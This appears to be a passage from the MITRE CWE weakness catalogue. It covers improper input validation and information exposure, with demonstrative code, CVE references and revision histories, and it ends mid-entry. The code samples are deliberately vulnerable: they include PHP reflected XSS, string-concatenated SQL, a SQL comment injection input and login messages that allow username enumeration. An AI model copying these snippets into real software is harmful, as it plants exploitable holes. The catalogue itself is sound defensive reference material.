- - ...public static final double price = 20.00;int quantity = currentUser.getAttribute("quantity");double total = price * quantity;chargeUser(total);... - - The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited. - - - This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares. - - ...#define MAX_DIM 100... - /* board dimensions */ - - int m,n, error;board_square_t *board;printf("Please specify the board height: \n");error = scanf("%d", &m);if ( EOF == error ){die("No integer passed: Die evil hacker!\n");}printf("Please specify the board width: \n");error = scanf("%d", &n);if ( EOF == error ){die("No integer passed: Die evil hacker!\n");}if ( m > MAX_DIM || n > MAX_DIM ) {die("Value too large: Die evil hacker!\n");}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));... - - While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program. - - - The following example shows a PHP application in which the programmer attempts to display a user's birthday and homepage. - - $birthday = $_GET['birthday'];$homepage = $_GET['homepage'];echo "Birthday: $birthday<br>Homepage: <a href=$homepage>click here</a>" - - The programmer intended for $birthday to be in a date format and $homepage to be a valid URL. However, since the values are derived from an HTTP request, if an attacker can trick a victim into clicking a crafted URL with <script> tags providing the values for birthday and / or homepage, then the script will run on the client's browser when the web server echoes the content. Notice that even if the programmer were to defend the $birthday variable by restricting input to integers and dashes, it would still be possible for an attacker to provide a string of the form: - - 2009-01-09-- - - If this data were used in a SQL statement, it would treat the remainder of the statement as a comment. The comment could disable other security-related logic in the statement. In this case, encoding combined with input validation would be a more useful protection mechanism. - Furthermore, an XSS (CWE-79) attack or SQL injection (CWE-89) are just a few of the potential consequences when input validation is not used. Depending on the context of the code, CRLF Injection (CWE-93), Argument Injection (CWE-88), or Command Injection (CWE-77) may also be possible. - - - The following example takes a user-supplied value to allocate an array of objects and then operates on the array. - - private void buildList ( int untrustedListSize ){if ( 0 > untrustedListSize ){die("Negative value supplied for list size, die evil hacker!");}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();} - - This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown. - - - This Android application has registered to handle a URL when sent an intent: - - - - ... - IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - ... - - public class UrlHandlerReceiver extends BroadcastReceiver { - @Overridepublic void onReceive(Context context, Intent intent) { - if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); - - ... - } - } - } - - The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. - - - - - CVE-2008-5305 - Eval injection in Perl program using an ID that should only contain hyphens and numbers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305 - - - CVE-2008-2223 - SQL injection through an ID that was supposed to be numeric. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223 - - - CVE-2008-3477 - lack of input validation in spreadsheet program leads to buffer overflows, integer overflows, array index errors, and memory corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3477 - - - CVE-2008-3843 - insufficient validation enables XSS - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3843 - - - CVE-2008-3174 - driver in security product allows code execution due to insufficient validation - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3174 - - - CVE-2007-3409 - infinite loop from DNS packet with a label that points to itself - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3409 - - - CVE-2006-6870 - infinite loop from DNS packet with a label that points to itself - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6870 - - - CVE-2008-1303 - missing parameter leads to crash - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1303 - - - CVE-2007-5893 - HTTP request with missing protocol version number leads to crash - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5893 - - - CVE-2006-6658 - request with missing parameters leads to information exposure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6658 - - - CVE-2008-4114 - system crash with offset value that is inconsistent with packet size - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114 - - - CVE-2006-3790 - size field that is inconsistent with packet size leads to buffer over-read - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3790 - - - CVE-2008-2309 - product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2309 - - - CVE-2008-3494 - security bypass via an extra header - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3494 - - - CVE-2008-3571 - empty packet triggers reboot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3571 - - - CVE-2006-5525 - incomplete denylist allows SQL injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5525 - - - CVE-2008-1284 - NUL byte in theme name causes directory traversal impact to be worse - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1284 - - - CVE-2008-0600 - kernel does not validate an incoming pointer before dereferencing it - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600 - - - CVE-2008-1738 - anti-virus product has insufficient input validation of hooked SSDT functions, allowing code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1738 - - - CVE-2008-1737 - anti-virus product allows DoS via zero-length field - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1737 - - - CVE-2008-3464 - driver does not validate input from userland to the kernel - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3464 - - - CVE-2008-2252 - kernel does not validate parameters sent in from userland, allowing code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2252 - - - CVE-2008-2374 - lack of validation of string length fields allows memory consumption or buffer over-read - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2374 - - - CVE-2008-1440 - lack of validation of length field leads to infinite loop - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1440 - - - CVE-2008-1625 - lack of validation of input to an IOCTL allows code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1625 - - - CVE-2008-3177 - zero-length attachment causes crash - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3177 - - - CVE-2007-2442 - zero-length input causes free of uninitialized pointer - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442 - - - CVE-2008-5563 - crash via a malformed frame structure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5563 - - - CVE-2008-5285 - infinite loop from a long SMTP request - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5285 - - - CVE-2008-3812 - router crashes with a malformed packet - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3812 - - - CVE-2008-3680 - packet with invalid version number leads to NULL pointer dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3680 - - - CVE-2008-3660 - crash via multiple "." characters in file extension - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3660 - - - - - Input validation and representation - - - A1 - Unvalidated Input - CWE More Specific - - - ERR07-C - Prefer functions that support error checking over equivalent functions that don't - - - FIO30-C - Exclude user input from format strings - CWE More Abstract - - - MEM10-C - Define and use a pointer validation function - - - 20 - Improper Input Handling - - - SFP25 - Tainted input to variable - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks. - - As of 2020, this entry is used more often than preferred, and it is a source of frequent confusion. It is being actively modified for CWE 4.1 and subsequent versions. - Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document. - Input validation - whether missing or incorrect - is such an essential and widespread part of secure development that it is implicit in many different weaknesses. Traditionally, problems such as buffer overflows and XSS have been classified as input validation problems by many security professionals. However, input validation is not necessarily the only protection mechanism available for avoiding such problems, and in some cases it is not even sufficient. The CWE team has begun capturing these subtleties in chains within the Research Concepts view (CWE-1000), but more work is needed. - - The "input validation" term is extremely common, but it is used in many different ways. In some cases its usage can obscure the real underlying weakness or otherwise hide chaining and composite relationships. - Some people use "input validation" as a general term that covers many different neutralization techniques for ensuring that input is appropriate, such as filtering, canonicalization, and escaping. Others use the term in a more narrow context to simply mean "checking if an input conforms to expectations without changing it." CWE uses this more narrow interpretation. - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Demonstrative_Examples, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Relationships, Research_Gaps, Terminology_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations, Research_Gaps, Terminology_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Applicable_Platforms, Common_Consequences, Relationship_Notes - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes - - - CWE Content Team - MITRE - 2020-08-20 - updated Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns, Relationships - - Insufficient Input Validation - - - - The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. - - There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: - - - private, personal information, such as personal messages, financial data, health records, geographic location, or contact details - system status and environment, such as the operating system and installed packages - business secrets and intellectual property - network status and configuration - the product's own code or internal state - metadata, e.g. logging of connections or message headers - indirect information, such as a discrepancy between two internal operations that can be observed by an outsider - - - Information might be sensitive to different parties, each of which may have their own expectations for whether the information should be protected. These parties include: - - - the product's own users - people or organizations whose information is created or used by the product, even if they are not direct product users - the product's administrators, including the admins of the system(s) and/or networks on which the product operates - the developer - - - Information exposures can occur in different ways: - - - the code explicitly inserts sensitive information into resources or messages that are intentionally made accessible to unauthorized actors, but should not contain the information - i.e., the information should have been "scrubbed" or "sanitized" - a different weakness or mistake indirectly inserts the sensitive information into resources, such as a web script error revealing the full system path of the program. - the code manages resources that intentionally contain sensitive information, but the resources are unintentionally made accessible to unauthorized actors. In this case, the information exposure is resultant - i.e., a different weakness enabled the access to the information in the first place. - - - It is common practice to describe any loss of confidentiality as an "information exposure," but this can lead to overuse of CWE-200 in CWE mapping. From the CWE perspective, loss of confidentiality is a technical impact that can arise from dozens of different weaknesses, such as insecure file permissions or out-of-bounds read. CWE-200 and its lower-level descendants are intended to cover the mistakes that occur in behaviors that explicitly manage, store, transfer, or cleanse sensitive information. - - - - - - - Primary - Developers may insert sensitive information that they do not believe, or they might forget to remove the sensitive information after it has been processed - - - Resultant - Separate mistakes or weaknesses could inadvertently make the sensitive information available to an attacker, such as in a detailed error message that can be read by an unauthorized party - - - - - - - - - Information Disclosure - This term is frequently used in vulnerability advisories to describe a consequence or technical impact, for any vulnerability that has a loss of confidentiality. Often, CWE-200 can be misused to represent the loss of confidentiality, even when the mistake - i.e., the weakness - is not directly related to the mishandling of the information itself, such as an out-of-bounds read that accesses sensitive memory contents; here, the out-of-bounds read is the primary weakness, not the disclosure of the memory. In addition, this phrase is also used frequently in policies and legal documents, but it does not refer to any disclosure of security-relevant information. - - - Information Leak - This is a frequently used term, however the "leak" term has multiple uses within security. In some cases it deals with the accidental exposure of information from a different weakness, but in other cases (such as "memory leak"), this deals with improper tracking of resources, which can lead to exhaustion. As a result, CWE is actively avoiding usage of the "leak" term. - - - - - Architecture and Design - - - Implementation - - - High - - - Confidentiality - Read Application Data - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Inter-application Flow Analysis - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - Automated Monitored Execution - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Context-configured Source Code Weakness Analyzer - - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - The following code checks validity of the supplied username and password and notifies the user of a successful or failed login. - - my $username=param('username'); - my $password=param('password'); - - if (IsValidUsername($username) == 1) - { - if (IsValidPassword($username, $password) == 1) - { - print "Login Successful"; - } - else - { - print "Login Failed - incorrect password"; - } - } - else - { - print "Login Failed - unknown username"; - } - - - In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials. - While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as: - - "Login Failed - incorrect username or password" - - - - This code tries to open a database connection, and prints any exceptions that occur. - - try {openDbConnection();} - //print exception message that includes exception message and configuration file location - catch (Exception $e) {echo 'Caught exception: ', $e->getMessage(), '\n';echo 'Check credentials in config file at: ', $Mysql_config_location, '\n';} - - If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database. - - - In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. - - public BankAccount getUserBankAccount(String username, String accountNumber) { - BankAccount userAccount = null;String query = null;try {if (isAuthorizedUser(username)) {query = "SELECT * FROM accounts WHERE owner = "+ username + " AND accountID = " + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);}} catch (SQLException ex) {String logMessage = "Unable to retrieve account information from database,\nquery: " + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);}return userAccount; - } - - The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. - - - This code stores location information about the current user: - - locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation()); - ... - - catch (Exception e) {AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage("Sorry, this application has experienced an error.");AlertDialog alert = builder.create();alert.show();Log.e("ExampleActivity", "Caught exception: " + e + " While on User:" + User.toString());} - - When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user's location is also written to the log. - - - The following is an actual MySQL error statement: - - Warning: mysql_pconnect(): Access denied for user: 'root@localhost' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4 - - The error clearly exposes the database credentials. - - - This code displays some information on a web page. - - Social Security Number: <%= ssn %></br>Credit Card Number: <%= ccn %> - - The code displays a user's credit card and social security numbers, even though they aren't absolutely necessary. - - - The following program changes its behavior based on a debug flag. - - <% if (Boolean.getBoolean("debugEnabled")) { - %>User account number: <%= acctNo %><%} %> - - - - - The code writes sensitive debug information to the client browser if the "debugEnabled" flag is set to true . - - - This code uses location to determine the user's current US State location. - First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml: - - <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> - - During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible: - - locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation); - - While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in. - - - - - CVE-2001-1483 - Enumeration of valid usernames based on inconsistent responses - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483 - - - CVE-2001-1528 - Account number enumeration via inconsistent responses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528 - - - CVE-2004-2150 - User enumeration via discrepancies in error messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150 - - - CVE-2005-1205 - Telnet protocol allows servers to obtain sensitive environment information from clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205 - - - CVE-2002-1725 - Script calls phpinfo(), revealing system configuration to web user - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1725 - - - CVE-2002-0515 - Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515 - - - CVE-2004-0778 - Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778 - - - CVE-2000-1117 - Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117 - - - CVE-2003-0190 - Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190 - - - CVE-2008-2049 - POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049 - - - CVE-2007-5172 - Program reveals password in error message if attacker can trigger certain database errors. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5172 - - - CVE-2008-4638 - Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638 - - - CVE-2007-1409 - Direct request to library file in web application triggers pathname leak in error message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409 - - - CVE-2005-0603 - Malformed regexp syntax leads to information exposure in error message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603 - - - CVE-2004-2268 - Password exposed in debug information. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2268 - - - CVE-2003-1078 - FTP client with debug option enabled shows password to the screen. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1078 - - - - - Information Leak (information disclosure) - - - A6 - Information Leakage and Improper Error Handling - CWE More Specific - - - 13 - Information Leakage - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - As a result of mapping analysis in the 2020 Top 25, this weakness is under review, since it is frequently misused in mapping to cover many problems that lead to loss of confidentiality. See Extended Decription and Alternate Terms. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-12-28 - updated Alternate_Terms, Description, Name - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Applicable_Platforms, References - - - CWE Content Team - MITRE - 2014-06-23 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Related_Attack_Patterns, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Alternate_Terms, Description, Maintenance_Notes, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Information Leak (Information Disclosure) - Information Exposure - - - - The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor. - Sensitive information could include data that is sensitive in and of itself (such as credentials or private messages), or otherwise useful in the further exploitation of the system (such as internal file system structure). - - - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Read Files or Directories - Read Memory - Read Application Data - Sensitive data may be exposed to attackers. - - - - - Requirements - Specify which data in the software should be regarded as sensitive. Consider which types of users should have access to which types of data. - - - Implementation - Ensure that any possibly sensitive data specified in the requirements is verified with designers to ensure that it is either a calculated risk or mitigated elsewhere. Any information that is not necessary to the functionality should be removed in order to lower both the overhead and the possibility of security sensitive data being sent. - - - System Configuration - Setup default error messages so that unexpected errors do not disclose sensitive information. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - The following is an actual MySQL error statement: - - Warning: mysql_pconnect(): Access denied for user: 'root@localhost' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4 - - The error clearly exposes the database credentials. - - - - - Accidental leaking of sensitive information through sent data - - - - - - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Common_Consequences, Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Demonstrative_Examples, Description, Name, References, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Description, Name - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - Information Leak Through Sent Data - Information Exposure Through Sent Data - Exposure of Sensitive Information Through Sent Data - - - - When trying to keep information confidential, an attacker can often infer some of the information by using statistics. - In situations where data should not be tied to individual users, but a large number of users should be able to make queries that "scrub" the identity of users, it may be possible to get information about a user -- e.g., by specifying search terms that are known to be unique to that user. - - - - - - - - - Architecture and Design - - - Implementation - - - Medium - - - Confidentiality - Read Files or Directories - Read Application Data - Sensitive information may possibly be leaked through data queries accidentally. - - - - - Architecture and Design - This is a complex topic. See the book Translucent Databases for a good discussion of best practices. - - - - - See the book Translucent Databases for examples. - - - - - Accidental leaking of sensitive information through data queries - - - - - - - - The relationship between CWE-202 and CWE-612 needs to be investigated more closely, as they may be different descriptions of the same kind of problem. CWE-202 is also being considered for deprecation, as it is not clearly described and may have been misunderstood by CWE users. It could be argued that this issue is better covered by CAPEC; an attacker can utilize their data-query privileges to perform this kind of operation, and if the attacker should not be allowed to perform the operation - or if the sensitive data should not have been made accessible at all - then that is more appropriately classified as a separate CWE related to authorization (see the parent, CWE-1230). - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated 